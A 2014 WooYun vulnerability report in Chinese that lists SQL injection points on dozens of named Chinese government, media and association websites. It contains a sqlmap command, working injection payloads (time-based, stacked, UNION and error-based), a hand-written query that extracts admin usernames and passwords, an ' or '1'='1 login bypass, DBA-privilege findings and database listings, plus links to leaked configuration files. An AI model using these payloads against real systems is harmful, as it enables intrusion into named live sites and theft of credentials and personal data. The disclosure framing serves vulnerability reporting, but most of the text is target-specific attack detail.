多个重要政府部门的SQL注入泄露大量敏感信息

漏洞详情

披露状态:

2014-02-25: 细节已通知厂商并且等待厂商处理中
2014-03-02: 厂商已经确认,细节仅向厂商公开
2014-03-12: 细节向核心白帽子及相关领域专家公开
2014-03-22: 细节向普通白帽子公开
2014-04-01: 细节向实习白帽子公开
2014-04-11: 细节向公众公开

简要描述:

多个SQL注入,埋伏很久了,一起提交了,希望能上主页!

详细说明:

一、

站点:

1.http://english.forestry.gov.cn 国家林业局

2.http://www.dam.com.cn/ 国家能源局大坝安全监察中心

3.http://fzb.serc.gov.cn 国家能源局福建监管办公室

4.http://www.12320.gov.cn/ 中华人民共和国卫生部12320卫生热线

5.http://sxxz.gov.cn/ 忻州市政府门户网站

6.http://www.ccat.net.cn/ 全国信息化计算机应用技术水平教育培训7.http://www.hbinvest.gov.cn/ 湖北省企业投资项目备案系统

8.http://www.yjzjj.gov.cn/ 延吉市住房和城乡建设局

9.http://www.tcrc.com.cn/ 太仓市人才网

10.http://bztg.ahbz.gov.cn/ 安徽省标准托管公益性服务平台

11.http://www.ytstc.gov.cn/ 烟台市科学技术局

12.http://www.gzgtzy.gov.cn/ 贵州国土资源厅

注入点:

http://english.forestry.gov.cn/web/article.do?action=search searchtype=TITLE&keyword=88952634

http://english.forestry.gov.cn/web/article.do?action=pic&id=200911230845201784&type=1

http://english.forestry.gov.cn/web/article.do?action=readnew&id=201401210426516440

//dam.com.cn中sqlmap测试时跳转302的均存在注入

http://www.dam.com.cn/news/view.jsp?id=6405

http://www.dam.com.cn/news/list.jsp?bt=88952634&lb=88952634

http://www.dam.com.cn/travel/view.jsp?id=43

http://www.dam.com.cn/damView/view.jsp?id=1084

http://fzb.serc.gov.cn/about.aspx?id=09187559-3061-4e1b-bd3c-24e23de714c5

http://fzb.serc.gov.cn/gg_view.aspx?id=

http://fzb.serc.gov.cn/news_view.aspx?id=a7026f37-d515-419a-9a33-4fde79b1c921

http://fzb.serc.gov.cn/zcfg_view.aspx?id=4b88f36d-c030-4812-a496-93d04a529fdd

http://fzb.serc.gov.cn/wjgg_view.aspx?id=fa92d166-16e2-4615-bd64-1f84b1c971c3

http://fzb.serc.gov.cn/jgyj_view.aspx?id=bd2bb099-4fbe-4500-9e0d-0f16d207d0f0

http://fzb.serc.gov.cn/zt.aspx?id=ccd743a9-e985-4e43-a068-0fc9dcf263d5

http://fzb.serc.gov.cn/index.aspx __VIEWSTATE=%2FwEPDwUKLTkyMjk3MjQzNGRkdRJ3FikjvJmVhljskWMSnYni54g%3D&ddlTyeps=0&linkSelect_8655=http%3A%2F%2Fwww.nea.gov.cn%2F&linkSelect_8656=http%3A%2F%2Fwww.fujian.gov.cn%2F&linkSelect_8657=http%3A%2F%2Fwww.sgcc.com.cn%2F&linkSelect_8658=http%3A%2F%2Fwww.fepsa.com.cn%2F&tbxKey=88952634

http://fzb.serc.gov.cn/about.aspx?cid=fbf030da-151a-4095-a01a-e16f103c29d5

http://fzb.serc.gov.cn/jgyj.aspx?id=1061b74d-3287-4631-ba7b-36612ebd55aa

http://fzb.serc.gov.cn/zcfg.aspx?id=6fdfd724-9ec3-4a34-8466-2bf3e43b466e

http://fzb.serc.gov.cn/xzxk_view.aspx?id=d9b314fb-792b-4ba3-a19f-9f6ec32a32b3

http://fzb.serc.gov.cn/xzxk_list.aspx?id=b6c4a001-9a5b-437e-b297-0536fc9e96a6

http://fzb.serc.gov.cn/xzxk_list.aspx?cid=7eb0722b-f520-440a-a1c4-3ef8a240498b&id=9c0d9c3c-8939-4563-9b34-fd2266e35f2c cid=7eb0722b-f520-440a-a1c4-3ef8a240498b

http://fzb.serc.gov.cn/xzxk_list.aspx?cid=7eb0722b-f520-440a-a1c4-3ef8a240498b&id=9c0d9c3c-8939-4563-9b34-fd2266e35f2c id=9c0d9c3c-8939-4563-9b34-fd2266e35f2c

http://fzb.serc.gov.cn/news.aspx?cid=c911328d-38d2-4562-b9c5-2f8882ddb2c0

http://fzb.serc.gov.cn/qzlx_view.aspx?id=7873b8cb-3a1a-4dbd-96f1-4907a317b350

http://fzb.serc.gov.cn/zt.aspx?sid=4b5386d2-1c63-47ac-b6b1-295e45e4cd43

http://www.12320.gov.cn/usoso/websiteTJ.jsp?id=

http://www.sxxz.gov.cn/templet/show_xz.php?id=209

http://sxxz.gov.cn/templet/show_xz.php?id=174

http://www.sxxz.gov.cn/templet/lhzt/2012/display.php?id=16706

http://sxxz.gov.cn/templet/list_xz.php?page=1&pagesize=20

http://www.sxxz.gov.cn/vote/toupiaocount.php?id=9 vote0=%E6%94%BF%E5%BA%9C%E9%A2%86%E5%AF%BC%E5%8A%A8%E6%80%81%E3%80%82&vote1=%E9%87%8D%E5%A4%A7%E6%94%BF%E7%AD%96%E5%87%BA%E5%8F%B0%E3%80%82&vote2=%E7%83%AD%E7%82%B9%E6%96%B0%E9%97%BB%E3%80%82&vote3=%E6%94%BF%E5%BA%9C%E5%85%AC%E5%91%8A%E5%85%AC%E7%A4%BA%E3%80%82&vote4=%E6%94%BF%E5%8A%A1%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81%E3%80%82&vote6=%E6%94%BF%E5%BA%9C%E9%87%87%E8%B4%AD%E4%BF%A1%E6%81%AF%E3%80%82&vote7=%E5%8F%91%E5%B1%95%E8%A7%84%E5%88%92%E3%80%82&vote8=%E6%94%BF%E5%BA%9C%E5%B7%A5%E4%BD%9C%E6%8A%A5%E5%91%8A%E3%80%82&vote9=%E9%87%8D%E7%82%B9%E9%A1%B9%E7%9B%AE%E5%BB%BA%E8%AE%BE%E3%80%82&submit=%E6%8A%95%E7%A5%A8&vote5=%E4%BA%BA%E4%BA%8B%E4%BB%BB%E5%85%8D%E4%BF%A1%E6%81%AF%E3%80%82

http://www.ccat.net.cn/info/index.asp?strParentCode=news

http://www.ccat.net.cn/certification/buddy_detail.asp?intID=1124

http://www.ccat.net.cn/info/detail.asp?strParentCode=news&strInfoTypeCode=news_87&intInfoID=1358

http://www.ccat.net.cn/organization/index2.asp?intOrgID=1

http://www.ccat.net.cn/corporation/list.asp?strInfoTypeCode=corporation_policy

http://www.ccat.net.cn/corporation/detail.asp?strInfoTypeCode=corporation_policy&intID=1287

http://www.ccat.net.cn/info/list.asp?strParentCode=curriculum&strInfoTypeCode=curriculum_507

http://www.ccat.net.cn/corporation/detail.asp?strInfoTypeCode=corporation_policy&intID=1287

http://www.ccat.net.cn/info/list.asp?strParentCode=curriculum&strInfoTypeCode=curriculum_507

http://www.ccat.net.cn/organization/get_org_index_url.asp?strOrgName=

http://www.ccat.net.cn/organization/intro.asp?intOrgID=1

http://www.ccat.net.cn/organization/list.asp?intOrgID=1&strCode=org_list2_1

http://www.ccat.net.cn/organization/featuredlinks.asp?intOrgID=1

http://www.ccat.net.cn/organization/detail.asp?intOrgID=1&strCode=org_news_1&intID=1038

http://www.ccat.net.cn/zscx/zscx.asp zsbh=88952634&imageField=88952634&sfz=88952634

http://www.ccat.net.cn/info/detail.asp?strParentCode=news&strInfoTypeCode=news_87&intInfoID=1358

http://www.ccat.net.cn/info/login_check.asp txtPassword=88952634&imageField=88952634&txtAccountName=88952634

http://www.ccat.net.cn/zscx/zscx.asp sfz=88952634&imageField=88952634&zsbh=88952634

http://www.hbinvest.gov.cn/prws/investment/reg_Step1.aspx __VIEWSTATE=dDwtMTU3Mjk2NTAyMjt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDzmgqjlpb3vvIzor7fnu6fnu63mgqjnmoTms6jlhow7Pj47Pjs7Pjs%2BPjs%2BPjtsPEltYWdlQnV0dG9uMTs%2BPodEoUEoFQIGce4hkZEDmiDh3gwB&Button1=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C3%BB%EF%BF%BD%EF%BF%BD%EF%BF%BD%CE%A8%D2%BB&txtPName=88952634&txtPassword=88952634&txtConfirmPassword=88952634&txtPTel=88952634&txtPPhone=88952634&txtPCompany=88952634&txtPEmail=safe3q%40gmail.com&ImageButton1=88952634&txtUserName=88952634

http://www.yjzjj.gov.cn/hf.php?zid=444

http://www.yjzjj.gov.cn/dcdb_index_info.php?id=84

http://www.yjzjj.gov.cn/dcdb_index_list.php?page=1&find=&gjz=

http://www.yjzjj.gov.cn/bxpt/search.php?st=0&sk=t&sd=d&sr=topics&sid=9b87931094abf9a1cdbc48deb19d5a23&search_id=unanswered st=0&sk=a&sd=a&sort=GO

http://www.tcrc.com.cn/Company/Jobs_Search_List.aspx?IndustryID=255&PositionID=255&JobsType=no&JobsKind=255&JobsCity=255&JobsExp=255&JobsLevel=255&JobsSex=255&ComNature=255&ComMemberNum=255&KeyWord=No&Pages=1&COMCONFIRMATION=1

http://bztg.ahbz.gov.cn/page/?content=%5B

http://www.ytstc.gov.cn/msglist.aspx __VIEWSTATE=%2FwEPDwUKLTY1ODQ0ODUxOA9kFgICAQ9kFgQCCQ8WAh4LXyFJdGVtQ291bnQCAxYGZg9kFgJmDxUFCeWkn%2BS4q%2BS4qwkyMDEwLTQtMjkM5YWs5LyX55WZ6KiABuivhOWlln%2For7fnnIvng5%2Flj7Dnp5HmioDlsYDnvZHnq5njgIrlhbPkuo7lgZrlpb0yMDEw5bm05bqm5bGx5Lic55yB56eR5a2m5oqA5pyv5aWW5ZKM54Of5Y%2Bw5biC56eR5a2m5oqA5pyv5aWW5o6o6I2Q5bel5L2c55qE6YCa55%2Bl44CLZAIBD2QWAmYPFQUJ5p2o5biC5rCRCTIwMTAtNC0yOQzlhazkvJfnlZnoqIAS6I%2Bx6ZWB5ZCI5L2c6K6h5YiSqQHmgqjlpb3jgILluILnuqfnp5HmioDpobnnm67nq4vpobnlrp7ooYznvZHkuIrnlLPmiqXvvIznvZHkuIror4TlrqHjgILlhbfkvZPkuovlrpzor7fnmbvlvZXluILnp5HmioDlsYDnvZHnq5lodHRwOi8vd3d3Lnl0c3RjLmdvdi5jbi%2FkuK3nmoTnp5HmioDorqHliJLnrqHnkIbns7vnu5%2FjgIINCg0KZAICD2QWAmYPFQUJ54mf5ZCR5LicCTIwMTAtNC0yOQzkuJrliqHlkqjor6IS6K%2Bi6Zeu5p%2Bl5paw5LqL5a6cwQIx44CBICDlnKjng5%2Flj7DluILnp5HlrabmioDmnK%2FlsYDnvZHnq5kgIGh0dHA6Ly93d3cueXRzdGMuZ292LmNuLyAg5paH5Lu25LiL6L295qCP55uuIOS4i%2Bi9veKAnOajgOe0ouafpeaWsOeUqOaIt%2BWnlOaJmOS5puKAnQ0KDQoy44CBICDloavlhpnvvJrmo4DntKLmn6XmlrDnlKjmiLflp5TmiZjkuaYNCg0KM%2BOAgSAg5bCG4oCc5qOA57Si5p%2Bl5paw55So5oi35aeU5omY5Lmm4oCdIOWPkemAgeiHs%2B%2B8mndseHhAeXRwcGMub3JnIA0KDQo044CBICDmiZPnlLXor53vvJo2MjQ3NjgzICDnoa7orqTpgq7ku7bmlLbliLDvvIzlubbnuqblrprml7bpl7Tmn6XmlrDjgIJkAgsPDxYGHgtSZWNvcmRjb3VudAIDHhBDdXJyZW50UGFnZUluZGV4AgEeCFBhZ2VTaXplAgNkZGQ4NM8Ie2CVUc0o8PH7BUla3XPaug%3D%3D&txttitle=88952634&Button1=%E6%9F%A5%E8%AF%A2&__EVENTVALIDATION=%2FwEWBALv8LziDgLEhISACwL55Jz4AQKM54rGBu2BLH%2Fr4ALVdHu%2Frnj476gV5Sex&txtname=88952634

http://www.gzgtzy.gov.cn:83/zlml_Detail.aspx?id=1

http://www.gzgtzy.gov.cn:83/SysManLogin.aspx __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODIyOTE3NTkxZGQVT%2Fjw0wU6x2aJ0R2ywinpTMSI%2BQ%3D%3D&UserName=88952634&ArchivesID=88952634&Submit1=%E9%AA%8C%E8%AF%81&__EVENTVALIDATION=%2FwEWAgLK8Jm8BALVo8avDi1%2FhQmpoWEBNvXMjIIi26o30Qer&UserPwd=88952634

二、

收集的未修复的站点:

1.中国新闻社新闻采编系统 http://218.244.247.142/chinanews/

数据库连接泄露,可查看大量隐秘信息

http://218.244.247.142/chinanews/conn.asp

两处SQL注入漏洞:

http://218.244.247.142/chinanews/system_manager/login.asp

http://218.244.247.142/chinanews/review_list.asp?bookid=1204200009

2.中国新闻网|柳州新闻 http://www.lz.chinanews.com

SQL注入:

http://www.lz.chinanews.com/Newslist.aspx?ClassID=8

http://www.lz.chinanews.com/ShowToday.aspx?NewsID=5589

http://www.lz.chinanews.com/ShowEC.aspx?NewsID=5518

泄露敏感信息:

http://www.lz.chinanews.com/g.rar

3.中国教育新闻网

http://www.jyb.cn/digg/jsiframe.php?id=160

4.中国教育新闻网分站 教育百事通管理系统

SQL注入:

http://admin.ask.jyb.cn/ask.php?c=49,55,56,62,59,64,63,60,61

管理员登录地址:

http://admin.ask.jyb.cn/Login.php

5.中国教育新闻网分站

http://gxsjk.jyb.cn/searchLqfs.html?province=

6.珠海新闻网

http://admin.zhnews.net/vote/vote.php?ud_id=71

7.河北省民政网

http://www.hebmz.gov.cn/next.jsp?ID=06

8.中国篮球协会官方网站

http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008

http://www.cba.gov.cn/cbastats/wcba/teamdetail.aspx?id=WTe004

http://www.cba.gov.cn/cbastats/wcba/calendarsearch.aspx?startshift=4&endshift=19&teamno=WTe004

9.吉林市人力资源和社会保障局

http://www.jljl.lss.gov.cn/index.asp

sqlmap.py -u "www.jljl.lss.gov.cn/ybcx.asp" --data="yblb=%D2%BD%C1%C6%B1%A3%CF%D5&ybxm=123&ybsfzh=123" --tables

10.广东省文物局

http://www.gdww.gov.cn/vote/result.php?VOTE_ID=14

11.广东省海洋与渔业局

http://www.gdofa.gov.cn/index.php/Search?kw=a

12.黑龙江省政协委员会

http://www.hljzx.gov.cn/News/SearchList.aspx?S_ID=-1&CMD=a%27%20and%201=%28select%20substring%28%28select%20UserID,U_LoginName,U_Password%20from%20sys_User%20for%20xml%20auto%29,1,4000%29%29--

13.中国国家人事人才培训网下属分站

http://www.ccat.net.cn/certificates/

1' or '1'='1/ 1' or '1'='1

14.中华人民共和国民政部民政论坛

http://bbs.mca.gov.cn/showcommonposts.php?length=31&pagesize=7&fid=7

http://bbs.mca.gov.cn/showtopclicks.php?pagesize=7

15.国家安全生产监督管理总局

http://aqzj.chinasafety.gov.cn/zj/zjkp_disp.jsp?yhid=1





漏洞证明:

1.http://english.forestry.gov.cn 国家林业局

DBA权限:

current user is DBA:    True



数据库:

available databases [34]:
[*] CTXSYS
[*] DATAINFO
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] EXPERTS
[*] FORESTRYTREE
[*] FORMOBILE
[*] FORMOBILEDEF
[*] GJLYJ
[*] LINYE
[*] LYJAPP
[*] LYJPORTAL
[*] MDSYS
[*] NEWHTJ
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PPGS
[*] RMAN
[*] ROPURPLAN
[*] SCOTT
[*] SFAZCSB
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRANS
[*] TSMSYS
[*] USER_MICROFORESTRY
[*] UUMLOG
[*] WMSYS
[*] X5LYJ
[*] X5SYS
[*] XDB



2.http://www.dam.com.cn/ 国家能源局大坝安全监察中心

MSSQL数据库:

Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=620; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=620 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008



DBA权限:

current user is DBA:    True



3.http://fzb.serc.gov.cn 国家能源局福建监管办公室

Oracle数据库:

Place: GET
Parameter: id
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=09187559-3061-4e1b-bd3c-24e23de714c5' AND 8801=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(105)||CHR(120)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (8801=8801) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(108)||CHR(102)||CHR(113)||CHR(62))) FROM DUAL) AND 'OUZG'='OUZG

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=09187559-3061-4e1b-bd3c-24e23de714c5' AND 1816=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(110)||CHR(105)||CHR(74),5) AND 'CpUA'='CpUA
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle



4.http://www.12320.gov.cn/ 中华人民共和国卫生部12320卫生热线

DBA权限:

current user is DBA:    True



数据库:

available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] U12320
[*] USRIMP
[*] WMSYS
[*] XDB



5.http://sxxz.gov.cn/ 忻州市政府门户网站

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=174 AND 2321=2321
---
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0



6.http://www.ccat.net.cn/ 全国信息化计算机应用技术水平教育培训

back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[3 tables]
+--------+
| user |
| config |
| info |
+--------+



7.http://www.hbinvest.gov.cn/ 湖北省企业投资项目备案系统

DBA权限:

Place: POST
Parameter: txtUserName
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=dDwtMTU3Mjk2NTAyMjt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDzmgqjlpb3vvIzor7fnu6fnu63mgqjnmoTms6jlhow7Pj47Pjs7Pjs+Pjs+PjtsPEltYWdlQnV0dG9uMTs+PodEoUEoFQIGce4hkZEDmiDh3gwB&Button1=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C3%BB%EF%BF%BD%EF%BF%BD%EF%BF%BD%CE%A8%D2%BB&txtPName=88952634&txtPassword=88952634&txtConfirmPassword=88952634&txtPTel=88952634&txtPPhone=88952634&txtPCompany=88952634&txtPEmail=safe3q@gmail.com&ImageButton1=88952634&txtUserName=88952634'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=dDwtMTU3Mjk2NTAyMjt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDzmgqjlpb3vvIzor7fnu6fnu63mgqjnmoTms6jlhow7Pj47Pjs7Pjs+Pjs+PjtsPEltYWdlQnV0dG9uMTs+PodEoUEoFQIGce4hkZEDmiDh3gwB&Button1=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C3%BB%EF%BF%BD%EF%BF%BD%EF%BF%BD%CE%A8%D2%BB&txtPName=88952634&txtPassword=88952634&txtConfirmPassword=88952634&txtPTel=88952634&txtPPhone=88952634&txtPCompany=88952634&txtPEmail=safe3q@gmail.com&ImageButton1=88952634&txtUserName=88952634' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
current user is DBA: True



8.http://www.yjzjj.gov.cn/ 延吉市住房和城乡建设局

Parameter: zid
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
Payload: zid=MAKE_SET(1238=1238,444)

Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: zid=444 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a697071,0x66536a5069785347736d,0x7179697671),NULL,NULL,NULL,NULL#
---
web application technology: Nginx, PHP 5.2.8
back-end DBMS: MySQL 5
current user: 'yjzjj@localhost'



9.http://www.tcrc.com.cn/ 太仓市人才网

Place: GET
Parameter: JobsKind
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: JobsKind=1015,1018) AND 8912=8912 AND (8114=8114

Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: JobsKind=1015,1018) AND 9432=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (2916=2916
---
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle



10.http://bztg.ahbz.gov.cn/ 安徽省标准托管公益性服务平台

bztg.jpg



11.http://www.ytstc.gov.cn/ 烟台市科学技术局

DBA权限:

Place: POST
Parameter: txttitle
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY1ODQ0ODUxOA9kFgICAQ9kFgQCCQ8WAh4LXyFJdGVtQ291bnRmZAILDw8WBh4LUmVjb3JkY291bnRmHhBDdXJyZW50UGFnZUluZGV4Zh4IUGFnZVNpemUCA2RkZCo3kGLTz48OeyXyC9TOXyBWXsQV&txttitle=88952634'; WAITFOR DELAY '0:0:5'--&Button1=%E6%9F%A5%E8%AF%A2&__EVENTVALIDATION=/wEWBAKJppi+BALEhISACwL55Jz4AQKM54rGBvrv3EldsKc3BaYOru9C4BW4nOMW&txtname=88952634

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY1ODQ0ODUxOA9kFgICAQ9kFgQCCQ8WAh4LXyFJdGVtQ291bnRmZAILDw8WBh4LUmVjb3JkY291bnRmHhBDdXJyZW50UGFnZUluZGV4Zh4IUGFnZVNpemUCA2RkZCo3kGLTz48OeyXyC9TOXyBWXsQV&txttitle=88952634' WAITFOR DELAY '0:0:5'--&Button1=%E6%9F%A5%E8%AF%A2&__EVENTVALIDATION=/wEWBAKJppi+BALEhISACwL55Jz4AQKM54rGBvrv3EldsKc3BaYOru9C4BW4nOMW&txtname=88952634
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user is DBA: True



available databases [16]:
[*] AchievementDB
[*] AdventureWorks
[*] AdventureWorksDW
[*] documentManager
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SubSystemDataBase
[*] tempdb
[*] yantaikjcxweb
[*] yantaikjj
[*] YourdpMapBiaoZhuiNew
[*] ytppc
[*] ytsj



12.http://www.gzgtzy.gov.cn/ 贵州国土资源厅

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1555=1555

Type: UNION query
Title: Generic UNION query (NULL) - 89 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(86)+CHAR(101)+CHAR(71)+CHAR(118)+CHAR(113)+CHAR(102)+CHAR(90)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(121)+CHAR(103)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

修复方案:

您懂!

版权声明:转载请注明来源 小驴牙牙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-02 10:37

厂商回复:

最新状态:

暂无


漏洞评价: